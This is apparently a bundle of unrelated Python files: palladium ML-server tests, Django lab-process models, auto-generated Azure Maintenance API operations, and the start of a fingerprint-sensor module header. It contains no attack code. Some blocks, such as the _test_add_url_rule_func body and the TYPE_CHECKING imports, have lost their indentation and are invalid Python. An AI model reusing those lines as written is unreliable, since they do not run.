            '[{"id": 1, "color": "blue", "length": 1.0}]\n',
            '[{"id": 1, "color": "{\\"a\\": 1, \\"b\\": 2}", "length": 1.0}]\n',
            '[{"id": 1, "color": "blue", "length": 1.0}, {"id": 2, "color": "{\\"a\\": 1, \\"b\\": 2}", "length": 1.0}]\n',
        ]
        for line in lines:
            io_in.write(line)
        io_in.write('EXIT\n')
        io_in.seek(0)
        predict = stream.predict_service.predict
        # One result dict per incoming sample.
        predict.side_effect = (
            lambda model, samples, **params:
            np.array([{'result': 1}] * len(samples))
        )
        # See note in test_listen_direct_exit: listen() runs synchronously.
        stream_thread = Thread(
            target=stream.listen(io_in, io_out, io_err))
        stream_thread.start()
        stream_thread.join()
        io_out.seek(0)
        io_err.seek(0)
        assert len(io_err.read()) == 0
        assert io_out.read() == (
            ('[{"result":1}]\n' * 2) + ('[{"result":1},{"result":1}]\n'))
        assert predict.call_count == 3
        # check if the correct arguments are passed to predict call
        assert predict.call_args_list[0][0][1] == np.array([
            {'id': 1, 'color': 'blue', 'length': 1.0}])
        assert predict.call_args_list[1][0][1] == np.array([
            {'id': 1, 'color': '{"a": 1, "b": 2}', 'length': 1.0}])
        assert (predict.call_args_list[2][0][1] == np.array([
            {'id': 1, 'color': 'blue', 'length': 1.0},
            {'id': 2, 'color': '{"a": 1, "b": 2}', 'length': 1.0},
            ])).all()
        # check if string representation of attribute can be converted to json
        assert ujson.loads(predict.call_args_list[1][0][1][0]['color']) == {
            "a": 1, "b": 2}
    def test_predict_error(self, stream):
        from palladium.interfaces import PredictError
        io_in = io.StringIO()
        io_out = io.StringIO()
        io_err = io.StringIO()
        line = '[{"hey": "1"}]\n'
        io_in.write(line)
        io_in.write('EXIT\n')
        io_in.seek(0)
        stream.predict_service.predict.side_effect = PredictError('error')
        stream_thread = Thread(
            target=stream.listen(io_in, io_out, io_err))
        stream_thread.start()
        stream_thread.join()
        io_out.seek(0)
        io_err.seek(0)
        # An empty result list is emitted and the error goes to io_err.
        assert io_out.read() == '[]\n'
        assert io_err.read() == (
            "Error while processing input row: {}"
            "<class 'palladium.interfaces.PredictError'>: "
            "error (-1)\n".format(line))
        assert stream.predict_service.predict.call_count == 1
    def test_predict_params(self, config, stream):
        from palladium.server import PredictService
        line = '[{"length": 1.0, "width": 1.0, "turbo": "true"}]'
        model = Mock()
        model.predict.return_value = np.array([[{'class': 'a'}]])
        model.turbo = False
        model.magic = False
        stream.model = model
        mapping = [
            ('length', 'float'),
            ('width', 'float'),
        ]
        params = [
            ('turbo', 'bool'),  # will be set by request args
            ('magic', 'bool'),  # default value will be used
        ]
        stream.predict_service = PredictService(
            mapping=mapping,
            params=params,
        )
        expected = [{'class': 'a'}]
        result = stream.process_line(line)
        assert result == expected
        assert model.predict.call_count == 1
        assert (model.predict.call_args[0][0] == np.array([[1.0, 1.0]])).all()
        assert model.predict.call_args[1]['turbo'] is True
        assert model.predict.call_args[1]['magic'] is False
class TestList:
    """Tests for the /list endpoint."""
    @pytest.fixture
    def list(self):
        # Deliberately shadows the builtin: returns the server's 'list' view.
        from palladium.server import list
        return list
    def test_it(self, config, process_store, flask_client):
        mp = config['model_persister'] = Mock()
        mp.list_models.return_value = ['one', 'two']
        mp.list_properties.return_value = {'hey': 'there'}
        resp = flask_client.get('list')
        assert resp.status_code == 200
        resp_data = json.loads(resp.get_data(as_text=True))
        assert resp_data == {
            'models': ['one', 'two'],
            'properties': {'hey': 'there'},
        }
class TestFitFunctional:
    """Tests for the /fit endpoint (asynchronous model-fitting jobs)."""
    @pytest.fixture
    def fit(self):
        from palladium.server import fit
        return fit
    @pytest.fixture
    def jobs(self, process_store):
        # Shared job registry; cleared after each test to avoid leakage.
        jobs = process_store['process_metadata'].setdefault('jobs', {})
        yield jobs
        jobs.clear()
    def test_it(self, fit, config, jobs, flask_app):
        dsl, model, model_persister = Mock(), Mock(), Mock()
        # Ensure hasattr(model, 'cv_results_') is False.
        del model.cv_results_
        X, y = Mock(), Mock()
        dsl.return_value = X, y
        config['dataset_loader_train'] = dsl
        config['model'] = model
        config['model_persister'] = model_persister
        with flask_app.test_request_context(method='POST'):
            resp = fit()
        # Give the background fit thread time to finish.
        sleep(0.05)
        resp_json = json.loads(resp.get_data(as_text=True))
        job = jobs[resp_json['job_id']]
        assert job['status'] == 'finished'
        assert job['info'] == str(model)
    @pytest.mark.parametrize('args, args_expected', [
        (
            {'persist': '1', 'activate': '0', 'evaluate': 't'},
            {'persist': True, 'activate': False, 'evaluate': True},
        ),
        (
            {'persist_if_better_than': '0.234'},
            {'persist_if_better_than': 0.234},
        ),
    ])
    def test_pass_args(self, fit, flask_app, args, args_expected):
        # Request args must be coerced to the types fit_base expects.
        with patch('palladium.server.fit_base') as fit_base:
            fit_base.__name__ = 'mock'
            with flask_app.test_request_context(method='POST', data=args):
                fit()
            sleep(0.02)
            assert fit_base.call_args == call(**args_expected)
class TestUpdateModelCacheFunctional:
    """Tests for the /update-model-cache endpoint."""
    @pytest.fixture
    def update_model_cache(self):
        from palladium.server import update_model_cache
        return update_model_cache
    @pytest.fixture
    def jobs(self, process_store):
        # Shared job registry; cleared after each test to avoid leakage.
        jobs = process_store['process_metadata'].setdefault('jobs', {})
        yield jobs
        jobs.clear()
    def test_success(self, update_model_cache, config, jobs, flask_app):
        model_persister = Mock()
        config['model_persister'] = model_persister
        with flask_app.test_request_context(method='POST'):
            resp = update_model_cache()
        # Allow the background job to complete.
        sleep(0.02)
        resp_json = json.loads(resp.get_data(as_text=True))
        job = jobs[resp_json['job_id']]
        assert job['status'] == 'finished'
        assert job['info'] == repr(model_persister.update_cache())
    def test_unavailable(self, update_model_cache, config, jobs, flask_app):
        model_persister = Mock()
        # Persister without an update_cache method -> endpoint reports 503.
        del model_persister.update_cache
        config['model_persister'] = model_persister
        with flask_app.test_request_context(method='POST'):
            resp = update_model_cache()
        assert resp.status_code == 503
class TestActivateFunctional:
    """Tests for the /activate endpoint."""
    @pytest.fixture
    def activate(self):
        from palladium.server import activate
        return activate
    @pytest.fixture
    def activate_base_mock(self, monkeypatch):
        # Replace the underlying activate implementation with a Mock.
        func = Mock()
        monkeypatch.setattr('palladium.server.activate_base', func)
        return func
    def test_success(self, activate, activate_base_mock, config, flask_app):
        model_persister = Mock(
            list_models=lambda: {'be': 'first'},
            list_properties=lambda: {'be': 'twice'},
        )
        config['model_persister'] = model_persister
        with flask_app.test_request_context(
            method='POST',
            data={'model_version': 123},
        ):
            resp = activate()
        assert resp.status_code == 200
        assert resp.json == {
            'models': {'be': 'first'},
            'properties': {'be': 'twice'},
        }
    def test_lookuperror(self, activate, activate_base_mock, flask_app):
        # Unknown model version -> service unavailable.
        activate_base_mock.side_effect = LookupError
        with flask_app.test_request_context(
            method='POST',
            data={'model_version': 123},
        ):
            resp = activate()
        assert resp.status_code == 503
def _test_add_url_rule_func():
return b'A OK'
class TestAddUrlRule:
    """Tests for palladium.server.add_url_rule with a dotted view_func path."""
    @pytest.fixture
    def add_url_rule(self):
        from palladium.server import add_url_rule
        return add_url_rule
    def test_it(self, add_url_rule, flask_client):
        # The view function is given as a dotted string and must be resolved.
        add_url_rule(
            '/okay',
            view_func='palladium.tests.test_server._test_add_url_rule_func',
        )
        resp = flask_client.get('/okay')
        assert resp.data == b'A OK'
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import datetime
import os
from django.core.files.storage import default_storage as labshare
from django.conf import settings
from django.db import models
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from actstream import action
from mptt import models as mptt
from polymorphic.models import PolymorphicModel
from simple_history import models as simple_history
from core.models.mixins import TimestampMixin, UUIDMixin
from core.models import fields, Investigation, Milestone
def get_file_path(instance, filename):
    """
    Build the storage path for a process upload.

    Files are stored under ``processes/<process uuid hex>/<filename>``.
    """
    process_dir = instance.process.uuid_full.hex
    return os.path.join('processes', process_dir, filename)
@python_2_unicode_compatible
class ProcessCategory(models.Model):
    """Holds information about the category of process types."""
    # The slug doubles as the primary key; uncreated rows fall back to
    # the 'uncategorized' bucket.
    slug = models.SlugField(primary_key=True, max_length=100, default='uncategorized')
    name = models.CharField(max_length=100)
    description = models.TextField(blank=True)
    class Meta:
        verbose_name = 'process category'
        verbose_name_plural = 'process categories'
    def __repr__(self):
        return '<{}: {}>'.format(self.__class__.__name__, self.slug)
    def __str__(self):
        return self.name
    def processtype_slugs(self):
        # Flat queryset of the ``type`` slugs of every ProcessType in
        # this category (reverse FK: ProcessType.category).
        return self.processtypes.values_list('type', flat=True)
@python_2_unicode_compatible
class ProcessType(models.Model):
    """
    Holds information about types of processes.
    """
    # Choices for how runs of this process type are scheduled.
    SCHEDULING_TYPE = (
        ('none', 'None'),
        ('simple', 'Simple'),
        ('full', 'Full'),
        ('external', 'External'),
    )
    # Choices for how new processes of this type are created in the UI.
    CREATION_TYPE = (
        ('default', 'Default'),
        ('custom', 'Custom'),
    )
    # The slug doubles as the primary key (referenced by Process.type).
    type = models.SlugField(primary_key=True, max_length=100, default='generic-process')
    name = models.CharField(max_length=100)
    full_name = models.CharField(max_length=255)
    is_destructive = models.BooleanField(default=True)
    description = models.TextField(blank=True)
    scheduling_type = models.CharField(max_length=10, choices=SCHEDULING_TYPE,
                                       default='none')
    creation_type = models.CharField(max_length=10, choices=CREATION_TYPE,
                                     default='default')
    category = models.ForeignKey(ProcessCategory, default='uncategorized',
                                 related_name='processtypes',
                                 related_query_name='processtype')
    def get_absolute_url(self):
        return '/process/type/{}'.format(self.type)
    def __repr__(self):
        return '<{}: {}>'.format(self.__class__.__name__, self.type)
    def __str__(self):
        return self.full_name
class ProcessTypeManager(models.Manager):
    """
    Manager restricted to a single process type (filters on ``type``).
    """
    def __init__(self, process_type):
        super(ProcessTypeManager, self).__init__()
        # Slug of the ProcessType this manager is bound to.
        self.process_type = process_type
    def get_queryset(self):
        base_qs = super(ProcessTypeManager, self).get_queryset()
        return base_qs.filter(type_id=self.process_type)
class Process(UUIDMixin, TimestampMixin, models.Model):
    """
    A process represents anything done to a sample which results in data
    (numerical or visual) or alters the properties of the sample.
    """
    # Prefix for generated identifiers — presumably consumed by UUIDMixin;
    # confirm against core.models.mixins.
    prefix = 'p'
    title = models.CharField(max_length=80)
    comment = fields.RichTextField(blank=True)
    legacy_identifier = models.SlugField(max_length=100)
    user = models.ForeignKey(settings.AUTH_USER_MODEL,
                             limit_choices_to={'is_active': True})
    run_date = models.DateField(default=datetime.date.today, blank=True)
    type = models.ForeignKey(ProcessType, default='generic-process')
    investigations = models.ManyToManyField(Investigation,
        related_name='processes', related_query_name='process',)
    milestones = models.ManyToManyField(Milestone,
        related_name='processes', related_query_name='milestone',)
    history = simple_history.HistoricalRecords()
    # Default manager plus two type-restricted managers (see ProcessTypeManager).
    objects = models.Manager()
    generic = ProcessTypeManager(process_type='generic-process')
    split = ProcessTypeManager(process_type='split-process')
    class Meta:
        verbose_name = 'process'
        verbose_name_plural = 'processes'
    def get_absolute_url(self):
        return '/process/{}'.format(self.uuid)
    @property
    def samples(self):
        """
        Retrieve a queryset of samples that have the process run on them.
        """
        # Local import avoids a circular import with core.models.
        from core.models import Sample
        # Collect every MPTT tree containing a node for this process, then
        # gather the sample ids attached anywhere in those trees.
        trees = ProcessNode.objects.filter(process=self).values_list('tree_id', flat=True)
        nodes = (ProcessNode.objects.filter(tree_id__in=trees,
                                            sample__isnull=False)
                            .values_list('sample', flat=True))
        return Sample.objects.filter(id__in=nodes).distinct()
    @property
    def nodes(self):
        # All ProcessNode rows pointing at this process.
        return self.processnode_set.all()
class ProcessNode(mptt.MPTTModel, UUIDMixin, TimestampMixin):
    """
    Model representing the nodes in a tree of various processes done to
    a sample.
    """
    # Prefix for generated identifiers — presumably consumed by UUIDMixin.
    prefix = 'n'
    comment = fields.RichTextField(blank=True)
    parent = mptt.TreeForeignKey('self', null=True, related_name='children')
    process = models.ForeignKey(Process, null=True)
    piece = models.CharField(max_length=5)
    number = models.IntegerField(default=1)
    objects = mptt.TreeManager()
    def get_sample(self):
        # The sample lives on the tree's root node — presumably set by the
        # reverse relation from Sample; confirm against core.models.Sample.
        return self.get_root().sample
    def swap_processes(self, other):
        # Exchange the process references of two nodes and persist both.
        tmp = self.process_id
        self.process_id = other.process_id
        other.process_id = tmp
        self.save()
        other.save()
class DataFile(PolymorphicModel, TimestampMixin):
    """
    Generic model for files associated with processes
    """
    # Template used to render this file type inline in the UI.
    partial_template = 'core/generic_file_partial.html'
    # Processing state of the stored data.
    DATA_STATE = [
        ('raw', 'Raw'),
        ('cleaned', 'Cleaned'),
        ('extracted', 'Extracted'),
        ('analyzed', 'Analyzed'),
        ('other', 'Other')
    ]
    # MIME types recognized for display purposes; '' means unknown.
    CONTENT_TYPE = [
        ('', 'Unknown'),
        ('application/octet-stream', 'Binary File'),
        ('application/pdf', 'PDF File'),
        ('application/vnd.ms-excel', 'Excel File'),
        ('application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'Excel File'),
        ('image/png', 'PNG Image'),
        ('image/bmp', 'BMP Image'),
        ('image/jpeg', 'JPEG Image'),
        ('image/tiff', 'TIFF Image'),
        ('image/gif', 'GIF Image'),
        ('text/plain', 'Plaintext File'),
        ('text/csv', 'CSV File'),
    ]
    process = models.ForeignKey(Process,
                                related_name='datafiles',
                                related_query_name='datafiles',
                                null=True)
    content_type = models.CharField(max_length=200, blank=True, choices=CONTENT_TYPE, default='')
    # File payload stored via the configured default storage backend
    # (imported above as ``labshare``); path comes from get_file_path().
    data = models.FileField(upload_to=get_file_path, storage=labshare,
                            max_length=200, blank=True, null=True)
    state = models.CharField(max_length=20, choices=DATA_STATE, default='raw')
class ProcessTemplate(TimestampMixin, models.Model):
    """
    Model for templating existing process details for later reference
    """
    # Source process the template was captured from.
    process = models.ForeignKey(Process,
                                related_name='templates',
                                related_query_name='templates')
    name = models.CharField(max_length=50, blank=True)
    title = models.CharField(max_length=80)
    comment = fields.RichTextField(blank=True)
    user = models.ForeignKey(settings.AUTH_USER_MODEL,
                             limit_choices_to={'is_active': True})
@receiver(models.signals.m2m_changed, sender=Process.investigations.through)
def process_actstream(sender, instance=None, created=False, **kwargs):
    # Emit an activity-stream 'created' action targeting each investigation
    # linked to the process whenever the Process<->Investigation m2m changes.
    # NOTE(review): m2m_changed does not send a ``created`` kwarg (that is a
    # post_save argument) and it fires on every add/remove/clear without
    # checking kwargs['action'], so actions may be emitted repeatedly for the
    # same links — confirm this is the intended behavior.
    for investigation in instance.investigations.all():
        action.send(instance.user,
                    verb='created',
                    action_object=instance,
                    target=investigation)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ApplyUpdatesOperations(object):
    """ApplyUpdatesOperations operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.maintenance.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    # NOTE: auto-generated code (AutoRest) — edits here are lost on regeneration.
    models = _models
    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    def get_parent(
        self,
        resource_group_name, # type: str
        resource_parent_type, # type: str
        resource_parent_name, # type: str
        provider_name, # type: str
        resource_type, # type: str
        resource_name, # type: str
        apply_update_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> "_models.ApplyUpdate"
        """Track Updates to resource with parent.
        Track maintenance updates to resource with parent.
        :param resource_group_name: Resource group name.
        :type resource_group_name: str
        :param resource_parent_type: Resource parent type.
        :type resource_parent_type: str
        :param resource_parent_name: Resource parent identifier.
        :type resource_parent_name: str
        :param provider_name: Resource provider name.
        :type provider_name: str
        :param resource_type: Resource type.
        :type resource_type: str
        :param resource_name: Resource identifier.
        :type resource_name: str
        :param apply_update_name: applyUpdate Id.
        :type apply_update_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ApplyUpdate, or the result of cls(response)
        :rtype: ~azure.mgmt.maintenance.models.ApplyUpdate
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplyUpdate"]
        # Map auth / not-found / conflict statuses to typed azure-core exceptions.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-09-01-preview"
        accept = "application/json"
        # Construct URL
        url = self.get_parent.metadata['url'] # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'resourceParentType': self._serialize.url("resource_parent_type", resource_parent_type, 'str'),
            'resourceParentName': self._serialize.url("resource_parent_name", resource_parent_name, 'str'),
            'providerName': self._serialize.url("provider_name", provider_name, 'str'),
            'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
            'applyUpdateName': self._serialize.url("apply_update_name", apply_update_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # Synchronous GET through the client pipeline.
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.MaintenanceError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('ApplyUpdate', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get_parent.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{providerName}/{resourceParentType}/{resourceParentName}/{resourceType}/{resourceName}/providers/Microsoft.Maintenance/applyUpdates/{applyUpdateName}'} # type: ignore
    def get(
        self,
        resource_group_name, # type: str
        provider_name, # type: str
        resource_type, # type: str
        resource_name, # type: str
        apply_update_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> "_models.ApplyUpdate"
        """Track Updates to resource.
        Track maintenance updates to resource.
        :param resource_group_name: Resource group name.
        :type resource_group_name: str
        :param provider_name: Resource provider name.
        :type provider_name: str
        :param resource_type: Resource type.
        :type resource_type: str
        :param resource_name: Resource identifier.
        :type resource_name: str
        :param apply_update_name: applyUpdate Id.
        :type apply_update_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ApplyUpdate, or the result of cls(response)
        :rtype: ~azure.mgmt.maintenance.models.ApplyUpdate
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplyUpdate"]
        # Map auth / not-found / conflict statuses to typed azure-core exceptions.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-09-01-preview"
        accept = "application/json"
        # Construct URL
        url = self.get.metadata['url'] # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'providerName': self._serialize.url("provider_name", provider_name, 'str'),
            'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
            'applyUpdateName': self._serialize.url("apply_update_name", apply_update_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # Synchronous GET through the client pipeline.
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.MaintenanceError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('ApplyUpdate', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{providerName}/{resourceType}/{resourceName}/providers/Microsoft.Maintenance/applyUpdates/{applyUpdateName}'} # type: ignore
    def create_or_update_parent(
        self,
        resource_group_name, # type: str
        provider_name, # type: str
        resource_parent_type, # type: str
        resource_parent_name, # type: str
        resource_type, # type: str
        resource_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> "_models.ApplyUpdate"
        """Apply Updates to resource with parent.
        Apply maintenance updates to resource with parent.
        :param resource_group_name: Resource group name.
        :type resource_group_name: str
        :param provider_name: Resource provider name.
        :type provider_name: str
        :param resource_parent_type: Resource parent type.
        :type resource_parent_type: str
        :param resource_parent_name: Resource parent identifier.
        :type resource_parent_name: str
        :param resource_type: Resource type.
        :type resource_type: str
        :param resource_name: Resource identifier.
        :type resource_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ApplyUpdate, or the result of cls(response)
        :rtype: ~azure.mgmt.maintenance.models.ApplyUpdate
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplyUpdate"]
        # Map auth / not-found / conflict statuses to typed azure-core exceptions.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-09-01-preview"
        accept = "application/json"
        # Construct URL
        url = self.create_or_update_parent.metadata['url'] # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'providerName': self._serialize.url("provider_name", provider_name, 'str'),
            'resourceParentType': self._serialize.url("resource_parent_type", resource_parent_type, 'str'),
            'resourceParentName': self._serialize.url("resource_parent_name", resource_parent_name, 'str'),
            'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # PUT against the fixed 'default' applyUpdate resource (see metadata URL).
        request = self._client.put(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.MaintenanceError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('ApplyUpdate', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    create_or_update_parent.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{providerName}/{resourceParentType}/{resourceParentName}/{resourceType}/{resourceName}/providers/Microsoft.Maintenance/applyUpdates/default'} # type: ignore
    def create_or_update(
        self,
        resource_group_name, # type: str
        provider_name, # type: str
        resource_type, # type: str
        resource_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> "_models.ApplyUpdate"
        """Apply Updates to resource.
        Apply maintenance updates to resource.
        :param resource_group_name: Resource group name.
        :type resource_group_name: str
        :param provider_name: Resource provider name.
        :type provider_name: str
        :param resource_type: Resource type.
        :type resource_type: str
        :param resource_name: Resource identifier.
        :type resource_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ApplyUpdate, or the result of cls(response)
        :rtype: ~azure.mgmt.maintenance.models.ApplyUpdate
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplyUpdate"]
        # Map auth / not-found / conflict statuses to typed azure-core exceptions.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-09-01-preview"
        accept = "application/json"
        # Construct URL
        url = self.create_or_update.metadata['url'] # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'providerName': self._serialize.url("provider_name", provider_name, 'str'),
            'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # PUT against the fixed 'default' applyUpdate resource (see metadata URL).
        request = self._client.put(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.MaintenanceError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('ApplyUpdate', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{providerName}/{resourceType}/{resourceName}/providers/Microsoft.Maintenance/applyUpdates/default'} # type: ignore
    def list(
        self,
        **kwargs # type: Any
    ):
        # type: (...) -> Iterable["_models.ListApplyUpdate"]
        """Get Configuration records within a subscription.
        Get Configuration records within a subscription.
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ListApplyUpdate or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.maintenance.models.ListApplyUpdate]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.ListApplyUpdate"]
        # Map auth / not-found / conflict statuses to typed azure-core exceptions.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-09-01-preview"
        accept = "application/json"
        def prepare_request(next_link=None):
            # Build the GET request; a continuation link is used verbatim
            # (it already carries its own query string).
            # Construct headers
            header_parameters = {} # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list.metadata['url'] # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {} # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {} # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            # Deserialize one page; ListApplyUpdate has no next-link field,
            # hence the None continuation token.
            deserialized = self._deserialize('ListApplyUpdate', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch one page and raise on any non-200 response.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                error = self._deserialize.failsafe_deserialize(_models.MaintenanceError, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Maintenance/applyUpdates'} # type: ignore
| |
'''
Ashwin Ahuja - ashhwin.ahuja@gmail.com
December 2015
This code is published under the MIT License, please look at the main folder for more information
This code makes use of the module obtained from SparkFun - the GT511C3 - and makes lots of use of the
library for arduino provided by them - hence, please look at this.
